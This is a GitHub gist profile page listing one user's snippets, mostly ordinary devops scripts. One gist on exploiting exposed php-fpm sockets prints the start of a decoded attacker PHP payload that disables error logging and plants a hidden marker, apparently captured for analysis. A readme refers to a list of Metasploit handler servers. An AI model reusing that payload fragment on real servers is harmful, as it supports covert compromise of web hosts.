Skip to content

Instantly share code, notes, and snippets.

Avatar

Remco Verhoef nl5887

View GitHub Profile
View whitelist.sh
#!/bin/bash
find "$@" -type f \( -perm -u=x -o -perm -g=x -o -perm -o=x \) -print0 | while read -d $'\0' file
do
OUTPUT=$(santactl fileinfo "$file")
if [[ $OUTPUT =~ (Code-signed[[:space:]]+:[[:space:]]Yes) ]]; then
echo -n "Whitelisting $file by certificate: "
santactl rule --whitelist --certificate --path "$file"
else
View README.md

It appeared that this was the Microsoft Sensor network.

@nl5887
nl5887 / base64-decoded-part.txt
Created Jun 1, 2020
Exploiting internet accessible php-fpm sockets
View base64-decoded-part.txt
<?php if(function_exists('error_reporting')){@error_reporting(0);}if(function_exists('ini_set')){@ini_set('error_reporting',0);@ini_set('error_log',NULL);@ini_set('log_errors',0);}$___=(isset($_SERVER["SCRIPT_NAME"])?$_SERVER["SCRIPT_NAME"]:(isset($_SERVER["SCRIPT_NAME"])?$_SERVER["SCRIPT_FILENAME"]:NULL));if($___==="/usr/bin/phar.phar"){echo"<span style='display:none'>".md5('lohpidr')."</span>";exit(0);}
@nl5887
nl5887 / example.go
Last active Apr 30, 2020
LoadCertificates will load all certificates and keys in multiple directories (using glob matching) and match certificates with their private keys.
View example.go
certificates, err := LoadCertificates("**.key", "**.crt")
if err != nil {
log.Fatal("Error loading x509 cert", rz.Err(err), rz.Any("cert-file", tlsCert))
}
tlsConfig := &tls.Config{
Certificates: certificates,
}
View spotty.sh
#!/usr/bin/env bash
AWS_CLI="aws --region $AWS_REGION"
PRICE=0.2
USER_NAME=#USERNAME#
KEY_NAME=#KEY NAME#
SECURITY_GROUP_ID=#SECURITY GROUP#
SUBNET_ID=#SUBNET#
VOLUME_SIZE=40
INSTANCE_TYPE=t2.2xlarge
@nl5887
nl5887 / start.sh
Last active Sep 12, 2019
Start docker tkiv cluster
View start.sh
export DATADIR=$(pwd)/tkiv-data/
for s in "pd1 pd2 pd3 tikv1 tikv2 tikv3"; do
docker stop $s
docker rm $s
done
#ifconfig lo0 alias 192.168.1.101
#ifconfig lo0 alias 192.168.1.102
#ifconfig lo0 alias 192.168.1.103
@nl5887
nl5887 / precommit
Last active Aug 28, 2019
Git pre-commit script that will validate build
View precommit
#!/bin/bash
set -e
DEST=$(mktemp -d)
SRC=$(pwd)
pushd .
cd $DEST; git clone $SRC/.git . >/dev/null 2>&1
cd $SRC; git diff -P --cached | patch -p1 -d $DEST >/dev/null
@nl5887
nl5887 / dockerize.sh
Created Aug 18, 2019
Docker build script that will only use git added files to container volume
View dockerize.sh
#!/bin/bash
DEST=$(mktemp -d)
SRC=$(pwd)
echo "Cloning $SRC into $DEST"
pushd .
cd $DEST
git clone $SRC/.git .
@nl5887
nl5887 / gist:0a55e297aad9bf5f4882deb44ea0ef79
Created Mar 18, 2019
fish function to query greynoise for specific ip
View gist:0a55e297aad9bf5f4882deb44ea0ef79
function greynoise
if test (count $argv) -eq 0
echo "No arguments specified. Usage:\necho greynoise {ip}"
return 1
end
set ip $argv[1]
curl -s -XPOST -d "ip=$ip" 'http://api.greynoise.io:8888/v1/query/ip'|jq '.'
end
@nl5887
nl5887 / 001_readme.md
Last active Feb 10, 2020
Metasploit Meterpreter handler servers (HTTP/HTTPS)
View 001_readme.md

This gist contains a list of verified Metasploit Meterpreter http(s) handlers and Powershell Empire http(s) listeners.

Servers could be malicious, or just part of a red teaming action.

Thanks to censys.io and Jose.